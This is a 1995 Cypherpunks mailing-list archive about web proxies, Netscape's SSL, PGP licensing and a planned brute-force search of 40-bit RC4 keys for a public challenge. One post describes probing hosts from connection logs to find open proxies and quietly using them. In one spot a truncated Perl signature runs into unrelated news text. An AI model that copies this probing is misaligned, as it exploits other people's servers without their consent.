cs.umass.edu (L. McCarthy) Date: Wed, 19 Jul 95 21:56:21 PDT Subject: Stego Standards Silly In-Reply-To: <8AD8535.00030001EC.uuout@famend.com> Message-ID: <9507200456.AA17771@cs.umass.edu> I suggested a scenario in which: >>> use of "conspicuous" digital signatures is legal Monty Harder writes: > Ah. No big deal then. After stegoing, you sign the GIF. Yes, that was exactly the point I made in my previous message. > But I am having a real problem with an overt policy of fiddling with > people's mail. If they did that, it would likely cause a huge backlash > that would be felt at the ballot box. I'm not so sure. (Yes, I'm very cynical about humans -- more than most people on the list, I think.) Everybody and her sister has been bombarding the firewalls list lately, asking about virus scanners and such. IMHO a *lot* of folks would be quite content to have somebody filter their mail "for viruses, harassment, etc." I hope I'm wrong.... -Futplex From corbeau at seanet.com Wed Jul 19 21:58:07 1995 From: corbeau at seanet.com (corbeau at seanet.com) Date: Wed, 19 Jul 95 21:58:07 PDT Subject: FWD:Speaker needed Message-ID: >Sender: html-authors-guild-owner at lists.Stanford.EDU >Status: > >Two topics to this post: > >1. I have been asked to speak at an Internet/WWW conference that will be >held in Charlotte, NC on October 23rd. Is the SC gonna jump on me for >mentioning my membership in the Guild in the bio that they will print in the >advertising flyers? > >2. I have been contacted by the producer of the conference and asked to >contact the Guild for help in finding an Internet Security Guru to speak at >the conference... If interested, point of contact is: > >rstoker at accunet.com > > >I will be posting more info (costs, location, times, etc.) as they come to me. > >BTW: Speaking of security, I have asked a question that has gone unanswered >(possibly due to being sidetracked by flamewars & whatnot)... anyone out >there know how to set up password security on pages running off >MacHTTP/WebStar servers? Any help is appreciated! > >TIA > > -AL GORDON > ProEMail Internet Services **************************** Thot one o' y'all might fit this bill... -corbeau From hfinney at shell.portal.com Wed Jul 19 22:53:50 1995 From: hfinney at shell.portal.com (Hal) Date: Wed, 19 Jul 95 22:53:50 PDT Subject: Netscape the Big Win In-Reply-To: Message-ID: <199507200552.WAA09896@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- I also agree that Netscape and similar browsers are a good target for crypto applications. I am working on a program (tentatively called webcloak) which runs on your PC next to your browser. You set the proxy in the browser to point at this program. This is a dialog box in Netscape and I think most browsers have this support. Then all of your communications go through this program. Unfortunately progress has been slow as I have been having to learn Winsock programming and re-learn Windows programming. But I do have a dummy program working which will pass commands through. It does not encrypt anything yet but simply redirects commands to a web proxy running on the net. Soon I will work on adding encryption, but the next step is to add dialog boxes to choose the web proxy to use. Right now it is hard coded in. Someone posted recently that the formerly open web proxy at http://www.proxy.aol.com:80/ is no longer responding. Also, a list member was running one for a while at http://spirit.aud.alcatel.com:8082/ but that is no longer working either. I have been looking for proxies by searching the incoming connection logs on this commercial system. I figure that some of the more frequently appearing hosts may be proxies. I telnet to them on port 80 and type "GET http://sony.com/". This is just a URL I use because it is short. Usually nothing happens but I have found a couple of proxies that still work. At this point I don't want to publicize them because they might be shut down as a result. I think running open web proxies (and another kind of proxy I will describe in a future message) will be a good thing for Cypherpunks to do. I know not everyone can do it; it takes more privileges and clout to keep a server running than to drop in a mail filter. But for those who do have the ability to leave background processes running I think these will be the remailers of the future. I hope some list members will start doing this. As another solution, I have developed a Perl script which anyone who can run CGI scripts can use to become a web proxy. Fortunately (and somewhat mysteriously) this commercial system lets me do that. Basically if you want to connect to http://www.mcom.com/ you instead connect to http://www.portal.com/~hfinney/webcloak.cgi?http://www.mcom.com/. The name of the CGI script and "?" is prepended to the desired URL. The script then receives the part after the "?" as its argv so it opens the URL and passes it back. So if you can't run a server but can install CGI scripts then you can run this "poor man's proxy". Unfortunately the standard proxy protocol will not work transparently with this; the CGI script and "?" pasting isn't done automatically by browsers. However my PC "webcloak" program does work with this kind of proxy; it pastes the required prefix string at the front of each URL. So if people do start using this approach the CGI proxies may be part of the solution. Soon I hope to be far enough along to ask people to start testing some of this software. Once I get the webcloak program able to be reconfigured by the end user I'll ask people to try it to see if it works on anybody else's PC than mine. It should hopefully work with anything that uses Winsock. Eventually I hope to see a lot of people running web proxies and privacy proxies (which just pass requests through to other web and privacy proxies - these are very simple connection redirectors, but do encryption and decryption for privacy). The end user can connect to a web site and update his list of proxy servers. Then when he fires up his local proxy interface program it can ping the various servers and print a summary of their response times. He clicks on the ones he wants, setting up a chain. Only the last one in the chain needs to be capable of proxying http requests, the others just pass data through. The local program connects to each of the proxies and negotiates a session key using PK encryption. This will be cached and used over a moderately extensive period of time, at least a few minutes. We can't possibly do a PK decryption for each link in a proxy for every .gif file in a page. That would be too slow. So instead it will just send a cache identifier to indicate which encryption key is in use. This is all pretty ambitious as you can see, but I am trying to do it incrementally. Even a basic system without encryption and where the user has to edit a text file to choose his proxy chain will provide some privacy protection. So I hope I will be able to interest people in providing the infrastructure needed for privacy protection on the Web. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBMA3umxnMLJtOy9MBAQHpSQIAvI/YB9JmGgwIaFWxCegAUtZ94eIHvOFU wVQPdXlvaLup8Kjcx1wTPm/oib8u7Ema+6eb/MGsQWrnYtCO8emoew== =zx5U -----END PGP SIGNATURE----- From erc at khijol.intele.net Wed Jul 19 23:13:55 1995 From: erc at khijol.intele.net (Ed Carp [khijol Sysadmin]) Date: Wed, 19 Jul 95 23:13:55 PDT Subject: Netscape the Big Win In-Reply-To: Message-ID: On Wed, 19 Jul 1995, Douglas Barnes wrote: > Java will be available for Windows 95 about the time Win 95 is > released, and a Mac version is due out "Real Soon Now." The > Mac version has been demoed to industry insiders already. One > of the obvious advantages is that it should be possible to > write a nice, GUI interface once, and be done with all of the > tiresome porting that seems to occupy too much of our time. I assume that there is a version available for UNIX, yes? -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From an253398 at anon.penet.fi Wed Jul 19 23:27:57 1995 From: an253398 at anon.penet.fi (Mole Rat) Date: Wed, 19 Jul 95 23:27:57 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: <9507200542.AA23518@anon.penet.fi> Ray Arachelian writes: > Hell, at this point, my guess is that the mafia(s) doesn't use crypto, or > that if it does, it can be caught via other means. A strong, well > developed crypto system in use by the mafia would more than likely never > happen... not until mobsters get into computers. Ditto for terrorists. Sounds like an untapped market segment. In which periodicals should one advertise consulting services in order to cover the mobster market? Seriously, I imagine that organized crime, like any other business, uses computers. Their level of crypto usage could be impressive, given the incentives. > If they did use crypto, I suspect they wouldn't get caught. (For the > paranoid, assuming they used crypto, and they didn't get caught, then the > FBI or other TLA is doing the same as the gov't in Farenheight 451... > pick someone else, and jail them. Otherwise, how do you explain all the > jailbird mobsters?) "There is no honor among thieves." Wiretaps, bugs, tails, informants, and good, old-fashioned, physical intimidation probably produce plenty of leads. I wasn't entirely facetious above about working for the mob, they probably pay well and don't bother with FICA and such. Plus there's that "family" atmosphere.... ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From warlord at MIT.EDU Thu Jul 20 00:05:43 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Thu, 20 Jul 95 00:05:43 PDT Subject: Netscape the Big Win In-Reply-To: Message-ID: <199507200705.DAA15320@toxicwaste.media.mit.edu> > I assume that there is a version available for UNIX, yes? It was originally released for Solaris 2.X machines, and it is currently being ported to a lot of other platforms. The major problem is that it requires a lot of threads support, which makes it difficult to port. -derek From perry at imsi.com Thu Jul 20 00:25:40 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 20 Jul 95 00:25:40 PDT Subject: Investigate Your Federal Building :) In-Reply-To: Message-ID: <9507200725.AA11960@snark.imsi.com> What pray tell, does thsi have to do with cypherpunks? The Gate writes: > Had problems with the original transmission... > > 21:22 EST > July 17th, 1995 > New Haven, CT > > Day One, Investigation Begins. Perry From stewarts at ix.netcom.com Thu Jul 20 00:38:42 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 20 Jul 95 00:38:42 PDT Subject: "Hey Phil! Stop telling people *not* to use PGP!" Message-ID: <199507200737.AAA05005@ix6.ix.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- At 02:00 PM 7/19/95 -0500, Robert A. Hayden wrote: >> I am fond of saying that we PGP enthusiasts have two choices ahead of us >> within a couple of years: either 5,000 enthusiasts using PGP with >> MAXIMAL SECURITY at all times, or 5,000 enthusiasts with MAXIMAL >> SECURITY and 10,000,000 computer-illiterate e-mail users using PGP with >> push-button interfaces and multi-user remote systems. >I said it last week, and I'll say it again. From a sociological >standpoint, it's those 10,000,000 computer-illiterate e-mail users that we >need to focus all of our efforts towards. Those 5,000 literate people we >really don't have to care about. But there are two different classes of issues here - the convenience-only issues, which can be fixed with bells and whistles and GUIs and audio-enhanced-RTFM-buttons, and the security-related issues. For security, there are three classes of users: 1 - folks with standalone systems and dial-up mail - no problem This is a _lot_ of users - AOL, Compuserve, etc. 2 - folks with single-user systems on networks - they need to make sure they've got PGP installed right (relatively easy, with local disks, but fancy install widgets may help), but beyond that they've got to know that PGP is only as secure as their machine and network configuration. Mostly ok, and to the extent it's not, they've got other serious problems. This is also a lot of users. 3 - folks with shared machines - these folks (mostly Unix users and college students, plus people who have web-space they need to telnet to, like me) do need to know their limitations, and currently have the most problems with convenience, having to haul files back to a secure machine to encrypt securely. The first step is education - manuals that say "Don't Panic Unless You Need To Be Paranoid" instead of "Panic Immediately", that can make them aware of the risks and tradeoffs. It's about two pages of well-written stuff, if someone wants to write it. The next step is either building convenient tools to help them with encryption, or building convenient installation scripts for the tools that already exist (e.g. mail, or scriptable terminal emulators which can automate a lot of the hauling around.) The big payoffs are for groups 1 and 2, but a lot of the technically savvy people who read manuals and have to convince system administrators to install stuff are in group 3. So this is basically a writing job, plus talking the PGP 3.0 people and maybe Phil into including the discussion with the manuals. Remailers, btw, are in this class, since they need to leave their passphrases out in relatively unprotected shell scripts. I used to run PGP on a diskless workstation (at least I was one of the people with the root password :-), but I was aware of the risks. I'm now using it both on my Netcom+Eudora+PrivateIdaho system and on the machine where I have web space, which I have to telnet to across Netcom. I take care of the trust problem there by using a short key with a big ugly "untrustable" string in the user name, and using S/Key to log in; if I had an encrypted telnet to run on both ends I'd probably want to use it, so I'm watching the Stel and other new stuff coming out. Bill Stewart -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: You can get PGP by anonymous ftp from ftp.ox.ac.uk iQBVAwUBMA4HvfthU5e7emAFAQFrMwH9Hh1oYQKvsuV/IyVUskv2aZbmuh8fXQgK XpSpucrJV27tlFbjIDVqmapMR77arZVOm2Hs0/NTB2uT2jDG1r5+Lw== =fRtS -----END PGP SIGNATURE----- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Thu Jul 20 00:39:04 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 20 Jul 95 00:39:04 PDT Subject: Is it legal for commercial companies to use PGP? Message-ID: <199507200736.AAA05001@ix6.ix.netcom.com> At 10:30 PM 7/19/95 -0400, tim werner wrote: >>From stewarts at ix.netcom.com Tue Jul 18 02:51:50 1995 >>Selling software containing the code is pretty clearly commercial. >>Non-commercial messages from your personal non-business machine are >>clearly non-commercial. Providing a service of encrypting and decrypting >>messages for people for money sounds like it's _very_ probably commercial. >>Encrypting and decrypting messages to/from your business that deal with money >>are a very gray area. > >Maybe "commercial company" is the wrong expression. All I meant was >that my company is not non-profit, or a university, or a government >organization. It is an engineering firm. What I have in mind is >nothing to do with a commercial use of encryption per se. That's what I thought you meant. >1) I have some email pen-pals that I would like to be able to use PGP to That would be fine to use PGP 2.6.2 for; there's realky no question. >2) It's entirely likely that people within the company may wish to get > into the habit of transmitting company data in encrypted form. This > is not a question of incorporating the encryption technology into a > product, or even into the sale of a product -- it's just a question > of keeping intra-company information transfers private. >The first is the one I'm really concerned with. The second would be >sort of a natural extension that, if legal, would be nice. I can't >imagine that these uses are subject to the ViaCrypt license, but I need >some reassurance/ammunition in order to be a little more open about >getting it installed on the machines in my department. The ViaCrypt license only matters if you're using ViaCrypt. The question of whether you can use PGP 2.6.2 for these is something you _do_ need to read the RSAREF license about, and maybe ask Jim Bidzos or a company lawyer-type about; encrypted mail within the company is probably ok, encrypted mail sending credit card numbers to pay for stuff is more questionable. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From perry at imsi.com Thu Jul 20 00:48:00 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 20 Jul 95 00:48:00 PDT Subject: Netscape the Big Win In-Reply-To: Message-ID: <9507200747.AA15208@snark.imsi.com> Timothy C. May writes: > Integration of crypto into Netscape is thus the Big Win. Crypto *is* integrated into Netscape. Unfortunately, the crypto is SSL -- a complete waste of time. Among other things, SSL only lets you authenticate to X.509 certificate roots that have been issued straight from the hands of Jim Bidzos -- which effectively means that you can secure only connections with Netscape commerce servers, and that you cannot authenticate both ends of the communications link. Its also just plain bad -- there are ugly holes in the security from what I can see. Netscape is, of course, pushing it as a standard. Vomit. Luckily, Netscape recently hired Tahir El Gammal (did I put too many m's there?) and he's a smart guy. Unfortunately, he seems to be in a position where he has to defend the fairly bad work they did already. Other web security systems are also on their way out, of course. Our own Eric Rescorla (who lurks most of the time) is the author of the SHTTP specification. > The relevance for Cypherpunks interested in writing code is that, in my > carefully considered opinion, writing for Netscape and other Web browsers > is the Big Win. Even over Windows (except Windows browsers, of course). Netscape is a closed system. You can't write code for it unless you work for Netscape. Perry From perry at imsi.com Thu Jul 20 01:27:15 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 20 Jul 95 01:27:15 PDT Subject: Name misspelling Message-ID: <9507200827.AA14586@webster.imsi.com> I've been informed that the proper spelling was Taher Elgamal. Perry From mnemonic at eff.org Thu Jul 20 04:44:58 1995 From: mnemonic at eff.org (Mike Godwin) Date: Thu, 20 Jul 95 04:44:58 PDT Subject: Why no action alert, coalition opposing S. 974? In-Reply-To: <199507192226.SAA10293@panix4.panix.com> Message-ID: <199507201143.HAA26318@eff.org> Shabbir writes: > S 974 is a silly bill. It's like someone went around and made a list > of all the things that would irk us and then wrote legislation > around it. > > However this bill isn't immediately going anywhere, and there's more > dangerous legislation on the floor that is looking a lot like a loaded > gun. > > VTW is tracking this bill and will put out alerts on it if it becomes > a more valid threat. However until then we'll not try to divide the > forces of the net on bills that aren't yet a serious threat. > > Read the bill, familiarize yourself with the analyses, but let's not > go running off every time some DC bozo writes a terrible bill. Especially > when there isn't even a subcommittee hearing scheduled yet. > > Let's try and do *one thing* at a time. I just want to say: I endorse everything Shabbir says here. --Mike From trei Thu Jul 20 05:53:40 1995 From: trei (Peter Trei) Date: Thu, 20 Jul 95 05:53:40 PDT Subject: (Cracking) Netscape (is) the Big Win Message-ID: <9507201253.AA18741@toad.com> > > Timothy C. May writes: > > Integration of crypto into Netscape is thus the Big Win. > Crypto *is* integrated into Netscape. Unfortunately, the crypto is SSL > -- a complete waste of time. >[snip] > Perry This is why it's imperative for cpunks to work on the SSL challenge recently posted. Cracking 40 bit RC4 will provide a strong industry incentive to move towards stronger crypto standards, and to pressure the government to relax ITAR. If the SSL crack looks like it will take a while to gear up, perhaps we should work on an interim project, cracking a straight 40bit rc4 encrypted message. If there is interest, I can create such a text, and escrow the key and plaintext in a PGP-encoded posting. While such a crack will not be as strong a blow against SSL and 40-bit crypto as cracking a complete SSL transaction, it will be a lot better then only being able to say 'Well, we didn't find a key, but we *did* sweep 40 bits of keyspace', which is all we have now. If need be, we can follow up with a crack of full-bore SSL. Disclaimer: I work on a competing product, but am posting this in my private capacity. We've bigger fish to fry than Netscape. Peter Trei ptrei at acm.org Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation trei at process.com From ANDREWR at real3.realtime.co.za Thu Jul 20 06:46:32 1995 From: ANDREWR at real3.realtime.co.za (Andrew Roos) Date: Thu, 20 Jul 95 06:46:32 PDT Subject: (Cracking) Netscape (is) the Big Win Message-ID: <10AECF4554D@real3.realtime.co.za> Peter Trei says: > This is why it's imperative for cpunks to work on the SSL challenge > recently posted. Cracking 40 bit RC4 will provide a strong industry > incentive to move towards stronger crypto standards, and to pressure > the government to relax ITAR. The SSL project is at an advanced stage. I am regression testing the third (and, I hope, final) version of the SSL bruter, while Adam and others are working on the key distribution mechanism. It is important in a project of this nature that everything be thoroughly tested before we start, so we don't waste thousands of hours of CPU time... Andrew ___________________________________________________________________________ #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL ($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2% Sa2/d0 7-20-95. NYPaper: "Clinton Assails Officers' Racist Event. Gathering Is Defended by the Organizer as Get-Acquainted Party." Mr. Rightmyer, organizer of the event, said he believed the criticism of the roundups was part of a politically motivated "setup" by the paramilitary group, the Gadsden Minutemen, who harbor intense hostility toward the ATF for its role in regulating the manufacture and sale of guns. Morris Dees, head of a prominent civil-rights organization, supported his view, and one Federal law-enforcement official said Mr. Rightmyer might be correct. JIV_tun "Montana Tax Protester Is Shot During a Raid." Local law-enforcement authorities, who had waited for more than three years to arrest a tax protester, Gordon Sellner, accused of trying to kill a lawman, shot and wounded him in a raid on his home. JAK_but [OpEd] "Terror In Montana: Judges do their jobs and risk their lives." Martha A. Bethel has been a municipal judge in Montana for nine years. This article is adapted from a statement she made last week at a Congressional forum on the militia movement. JUG_hug Trio: BUS_gut From cme at TIS.COM Thu Jul 20 07:02:13 1995 From: cme at TIS.COM (Carl Ellison) Date: Thu, 20 Jul 95 07:02:13 PDT Subject: IITF Report Message-ID: <9507201400.AA03724@tis.com> The Information Infrastructure Task Force (IITF) National Information Infrastructure Security Issues Forum draft report can be found at: http://ntiaunix1.ntia.doc.gov:70/0/iitf/security/fedrole.txt From rsalz at osf.org Thu Jul 20 07:15:54 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 20 Jul 95 07:15:54 PDT Subject: Netscape the Big Win Message-ID: <9507201415.AA23275@sulphur.osf.org> > Luckily, Netscape recently hired Taher Elgamal > and he's a smart guy. Unfortunately, he seems to be in a > position where he has to defend the fairly bad work they did already. When I first saw him speak at the Danvers IETF I thought "gee, does this bozo know he shares the same last name as a real bright guy"? I think it was Perry, for example, that pointed out that using one RC4 stream for each comm half was more-or-less obvious and standard practice. At last month's World Wide Web Consortium working group meeting on security, everyone trashed SSL. Everyone trashed the W3C for not just picking SHTTP but instead trying to invent something new that "borrowed from" SHTTP. Tahir was silent on the former, but didn't disagree on the latter. During a break, in the hallway he mentioned how he's gonna have to do some politicking back at the office, and that he's glad someone reasonable like him came, and not other folks he could name. > Netscape is a closed system. You can't write code for it unless you > work for Netscape. I thought they announced their intent to support java. /r$ From dave at dvorak.jta.edd.ca.gov Thu Jul 20 07:48:46 1995 From: dave at dvorak.jta.edd.ca.gov (Dave Otto) Date: Thu, 20 Jul 95 07:48:46 PDT Subject: Netscape the Big Win In-Reply-To: Message-ID: <199507201449.HAA02245@dvorak.jta.edd.ca.gov> on Wed, 19 Jul 1995 20:24:31 -0800 Douglas Barnes wrote: > available on Suns running Solaris 2.4 and PCs running Windows NT. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Are there any plans to port JAVA to a REAL operating system? Support for crypto needs to be ubiquitous to work. Start with the fanatics (Linux and FreeBSD) and the other platforms will quickly follow (often ported by the afore mentioned fanatics so that the departmental server can run the same code as their desktop box :-). Dave Otto - Vinimus, Vedimus, Dolivamus http://ACM.org/~daveotto/ http://ACM.org/~daveotto/linux.html/ dave at dvorak.jta.edd.ca.gov daveotto at acm.org "Pay no attention to the man behind the curtain!" [the Great Oz] finger DaveOtto at ACM.org/or server for PGP 2.6 key <0x3300e841> From hfinney at shell.portal.com Thu Jul 20 07:54:57 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 20 Jul 95 07:54:57 PDT Subject: Netscape the Big Win In-Reply-To: <9507200747.AA15208@snark.imsi.com> Message-ID: <199507201453.HAA19510@jobe.shell.portal.com> "Perry E. Metzger" writes: >Crypto *is* integrated into Netscape. Unfortunately, the crypto is SSL >-- a complete waste of time. >Among other things, SSL only lets you authenticate to X.509 >certificate roots that have been issued straight from the hands of Jim >Bidzos -- which effectively means that you can secure only connections >with Netscape commerce servers, and that you cannot authenticate both >ends of the communications link. Its also just plain bad -- there are >ugly holes in the security from what I can see. Netscape is, of >course, pushing it as a standard. Vomit. Unfortunately the main alternative to SSL being pushed now, SHTTP, also suffers from RSA-itis. It will support either PEM or PKCS-7 key certificates, so I think ends up being pretty much the same as SSL in this regard. Note though that neither SSL or SHTTP requires that the certificates come from RSA. However the current versions of Netscape's browser do require this. This has been the source of much complaint and Netscape has promised that they will have some mechanism in the future to allow the user to choose his certificate signers. I am not sure how far RSA will let them off the leash, though. The current version of SSL supports client authentication (via X.500 certificates of course). rsalz at osf.org writes re SSL: >I think it >was Perry, for example, that pointed out that using one RC4 stream for >each comm half was more-or-less obvious and standard practice. I'm not sure what this is getting at. SSL does use a separate RC4 stream for each comm half. Is this a suggestion that a single key should be used for both directions? There are two ways that could be done: keep separate state info for each direction, in which case you are encrypting data twice with the same pseudo-random string, a definite no-no; or try to keep a single global state for the cipher, but this is impossible due to the (potentially) asynchronous nature of the communications. Back to Perry: >Netscape is a closed system. You can't write code for it unless you >work for Netscape. That is why I am working on the proxy approach. Any browser should be able to use enhancements supplied in this way. Netscape is the big name this year, who knows who it will be next year. As long as IP connectivity is available a proxy can get into the stream and apply enhancements. Hal From rsalz at osf.org Thu Jul 20 08:17:22 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 20 Jul 95 08:17:22 PDT Subject: Netscape the Big Win Message-ID: <9507201516.AA23453@sulphur.osf.org> > I'm not sure what this is getting at. SSL does use a separate RC4 stream > for each comm half. Is this a suggestion that a single key should be > used for both directions? No. They were saying "look, we use two keys." And Perry went "duh." /r$ From pfarrell at netcom.com Thu Jul 20 08:18:57 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Thu, 20 Jul 95 08:18:57 PDT Subject: Netscape the Big Win Message-ID: <40697.pfarrell@netcom.com> tcmay at sensemedia.net (Timothy C. May) writes: > * I use Netscape to read News. > * I use Netscape to access the Web. > * I still use Eudora to send and receive Mail. (Netscape can currently > send mail, but not receive it. This is likely to change soon.) I'm not about to argue that the web isn't the hotest thing on the net, which is the hotest thing in computing... But I've got a question that I can't resolve. The current trend is to bundle all types of functionality into huge monolithic programs. Add mail to netscape, add encryption, add ... Yet most of the computers people use are multi-windows, and soon most will even be multi-tasking. Why are all-in-one programs so preferable to using the windowing capabilities that are built into every X-window, Mac or Windows system? Why not use the best mail client, another best webcrawler, and yet another news reader? Microsoft has been preaching the use of OLE and component programs as its development vision for 2+ years, Macs have been popular for ten years, why is the trend still towards adding every possible bell and whistle to single programs? With components, it wouldn't be hard to have a universal Encryption/Signature module. It would get arround any propriatary restriction that vendors may or may not try to enforce ("can Netscape be extended or not" becomes moot). Is clicking on another icon really too hard? Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From schampeo at imonics.com Thu Jul 20 08:23:11 1995 From: schampeo at imonics.com (Steven Champeon - Imonics Development) Date: Thu, 20 Jul 95 08:23:11 PDT Subject: Netscape the Big Win Message-ID: <9507201522.AA14900@fugazi.imonics.com> | From: Hal | Subject: Re: Netscape the Big Win | | [ much complaining by .pm deleted ] | | Note though that neither SSL or SHTTP requires that the certificates come | from RSA. However the current versions of Netscape's browser do require this. | This has been the source of much complaint and Netscape has promised that | they will have some mechanism in the future to allow the user to | choose his certificate signers. I am not sure how far RSA will let them | off the leash, though. I do know that at the Netscape Spring Training I attended, that was the source of much consternation from the techies (who knew what it meant) and Mr. ElGemal was certainly aware of it. The thing that scared me was that most of the sales and marketing folks took the approach that I think we can expect from them: "What! That's ridiculous! Oh, it's only $230? Oh, okay. That's cheap enough." and then they went on their happy way. The one "advantage" to SSL that they were pushing over SHTTP was that SSL is a socket-level encryption mechanism, as opposed to protocol- level. It doesn't conflict with SHTTP except in terms of adding to the processing time. I guess I don't see why SSL is so awful from a crypto standpoint. Could someone a bit more educated on the nuts and bolts clue me in on its weaknesses? As compared to other schemes, perhaps? Thanks in advance, Steve Champeon Technical Lead, Web Services Imonics Corporation From cme at TIS.COM Thu Jul 20 08:30:51 1995 From: cme at TIS.COM (Carl Ellison) Date: Thu, 20 Jul 95 08:30:51 PDT Subject: P.S. re: IITF Report Message-ID: <9507201521.AA11198@tis.com> I am told by my local net expert that it should have been: http://ntiaunix1.ntia.doc.gov:70/iitf/security/fedrole.txt (but the URL I sent before worked for me). The report is dated June 14 -- but I don't remember seeing any discussion of it on the list. IMHO, it's very good -- gives passing mention of Clipper but doesn't push GAK. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme/home.html | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +----------------------------------------------------------- Jean Ellison -+ From adam at bwh.harvard.edu Thu Jul 20 08:56:27 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 20 Jul 95 08:56:27 PDT Subject: Netscape the Big Win In-Reply-To: <199507201453.HAA19510@jobe.shell.portal.com> Message-ID: <199507201556.LAA15191@bwh.harvard.edu> Hal writes: | >Among other things, SSL only lets you authenticate to X.509 | >certificate roots that have been issued straight from the hands of Jim | Unfortunately the main alternative to SSL being pushed now, SHTTP, also | suffers from RSA-itis. It will support either PEM or PKCS-7 key | certificates, so I think ends up being pretty much the same as SSL in | this regard. Actually, it also supports Kerberos (not relevant to most of us), and PGP messaging. Although a KCA would be needed before anything useful came of the PGP support, at least its there. However, right now, there are few real alternatives to RSA based schemes. Has anyone looked deeply at SLED's procedures for key authentication? Adam From monty.harder at famend.com Thu Jul 20 09:06:04 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Thu, 20 Jul 95 09:06:04 PDT Subject: Free The World Web Server project.. :) In-Reply-To: <8AD81C0.00030001D9.uuout@famend.com> Message-ID: <8AD9224.00030001F5.uuout@famend.com> PE> > PE> would be discerned by a staffer in moments. Crap like this is called PE> > PE> > They should know, because they send form letters to constituents all PE> > the time, only they don't bother to vary it a bit. PE> PE> Misdirection. This has nothing to do with my point. The staffers will PE> STILL toss your stuff. After putting the appropriate tally mark on the sheet for the day's mail, and sending out the response letter, yep. I don't expect Jan Meyers to personally =ever= see my mail to her office. I only expect her gruntlings to put that mark under "no" for the ______ Bill. PE> > Meanwhile, back at the ranch. PE> PE> In other words, you are choosing to ignore me. Regardless of whether Not at all. I concede that letters do not get read by Anyone Important. I only want them to =count= the darned things, and the variations in verbiage, margins, fonts, etc. should be enough to get them classified as part of an organized letter-writing campaign, instead of a form-letter-signing campaign. That puts the mark in a different column. PE> you are paying attentoion, however, you will still not be able to Not only am I paying attentoion [sic], but I know from experience that the staffers at least have to pay enough themselves to know which form letter to send me in response to my Heartfelt Expressions of Concern. Without fail, I get that letter from Meyers' office, but only about half the time from Dole or Kassebaum. PE> > .. If one of our DC members can set up an PE> > Imail-FAX gateway, we can publicize some nifty Iddresses for folx to PE> PE> Perhaps people who can be bothered to spell out "folks" properly also When I am writing to people whose opinion of my spelling I give a snit about, I will spell it precisely as you indicate. If it annoys you, set up your copy of exxxon to do the transform, or put my name in your twit filter. Talk about misdirection.... But "folx" is exactly the kind of thing that tells the staffer that it is =not= a form letter, because a computer would not be programmed to use variant spellings, would it? PE> are willing to write letters that will be paid attention to. As you PE> seem to prefer to ignore the fact that you will be ignored, why are PE> you willing to spend effort setting up an "Imail[sic]-FAX gateway"? Because that gateway can be used to convert genuinely original, pseudo-original, or blatantly copied Internet mail, ^ ^^^^ May God have mercy on my soul for having coined an =original= abbrv'n. rather than merely rearranging the words and phrases that others frequently use, which would, of course, be Astroturf. I have never seen the Houston Oilers play football on faxes before.... which has no, or virtually no, marginal cost to most net.people, into actual paper, which, being tangible, has the potential to be counted as Natural Grass, and thus not contribute to knee injuries. * Abuse of power comes as no surprise. --- * Monster at FAmend.Com * From rjc at clark.net Thu Jul 20 09:13:06 1995 From: rjc at clark.net (Ray Cromwell) Date: Thu, 20 Jul 95 09:13:06 PDT Subject: Netscape the Big Win In-Reply-To: <9507200747.AA15208@snark.imsi.com> Message-ID: <199507201612.MAA11998@clark.net> Perry writes: > > The relevance for Cypherpunks interested in writing code is that, in my > > carefully considered opinion, writing for Netscape and other Web browsers > > is the Big Win. Even over Windows (except Windows browsers, of course). > > Netscape is a closed system. You can't write code for it unless you > work for Netscape. > > Perry I concur with everything you said Perry. However, it may be possible to write code "for netscape". If their NSAPI (control the browser remotely via message/event passing) allows full control, you could probably hook into the crypto functions. If not, you could always generate forms and html pages on the fly with the data you want to send, and force the browser to submit them. If the other end has an SHTTP/SSL enabled server, it will be sent encrypted. It's a yucky solution. If Netscape incorporates *full* hotjava capability (like defining new protocol handlers such as SECURE://), then that would be much better. I have some doubts that Netscape will implement all the Hotjava functionality when they incorporate Java because it would allow people to change the look-and-feel (and functionality) of the browser too much, and also because they would have to softcode (in java), a lot of the functionality they have hardcoded right now. Browsers are beginning to become like emacs. Virtual operating systems unto themselves. -Ray From Doug.Hughes at Eng.Auburn.EDU Thu Jul 20 09:13:30 1995 From: Doug.Hughes at 